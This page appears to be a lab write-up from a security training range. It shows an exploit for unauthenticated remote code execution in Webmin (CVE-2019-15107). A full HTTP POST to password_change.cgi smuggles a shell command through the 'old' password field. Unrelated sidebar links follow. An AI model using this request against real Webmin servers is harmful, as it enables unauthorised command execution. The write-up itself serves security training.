当前位置:网站首页>Moher College webmin unauthenticated remote code execution
Moher College webmin unauthenticated remote code execution
2022-07-04 07:44:00 【Lyswbb】
First, get to the shooting range and visit , Visit a landing page later
According to the title , Unauthorized rce, So you can look for history first CVE Number (CVE-2019-15107), After finding it, directly reproduce the vulnerability , The vulnerability lies in the password reset function :Webmin--Webmin confuration--Authentication
burp Grab traffic packets , Then change the parameters , Pay attention to the need to session_login.cgi Change to password_change.cgi, The following parameters can be copied directly , The trigger of this vulnerability point only needs to pass one expired
Execute the command with parameters
POST /password_change.cgi HTTP/1.1
Host: 124.70.64.48:47372
Cookie: redirect=1; testing=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: https://124.70.64.48:47372
Referer: https://124.70.64.48:47372/session_login.cgi
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
user=dfgfgf&pam=&expired=2&old=test|pwd&new1=test2&new2=test2
Directly query the root key.txt that will do
边栏推荐
- zabbix 5.0监控客户端
- JVM中堆概念
- Relations courantes de la fiche de données d'exploitation pour les activités
- 促进OKR落地的工作总结该如何写?
- Email alarm configuration of ZABBIX monitoring system
- 【Go基础】1 - Go Go Go
- Rhcsa the next day
- 墨者学院-phpMyAdmin后台文件包含分析溯源
- Linear algebra 1.1
- [network security] what is emergency response? What indicators should you pay attention to in emergency response?
猜你喜欢
Introduction to neural network (Part 2)
Ecole bio rushes to the scientific innovation board: the annual revenue is 330million. Honghui fund and Temasek are shareholders
This article is enough for learning advanced mysql
Oracle stored procedures and functions
Preliminary study on temporal database incluxdb 2.2
Unity 从Inspector界面打开资源管理器选择并记录文件路径
zabbix監控系統自定義監控內容
Guoguo took you to write a linked list, and the primary school students said it was good after reading it
Node foundation ~ node operation
Wechat has new functions, and the test is started again
随机推荐
21 examples of strategic goals to promote the rapid development of your company
PCIE知识点-010:PCIE 热插拔资料从哪获取
L1-021 important words three times (5 points)
Oracle stored procedures and functions
Zephyr 学习笔记1,threads
[untitled] notice on holding "2022 traditional fermented food and modern brewing technology"
Implementation of ZABBIX agent active mode
zabbix监控系统自定义监控内容
Zephyr study notes 2, scheduling
zabbix 5.0监控客户端
[network security] what is emergency response? What indicators should you pay attention to in emergency response?
Tri des fonctions de traitement de texte dans MySQL, recherche rapide préférée
JVM中堆概念
【Go基础】2 - Go基本语句
Google's official response: we have not given up tensorflow and will develop side by side with Jax in the future
Activiti common operation data table relationship
L1-030 one gang one (15 points)
University stage summary
With excellent strength, wangchain technology, together with IBM and Huawei, has entered the annual contribution list of "super ledger"!
L1-022 odd even split (10 points)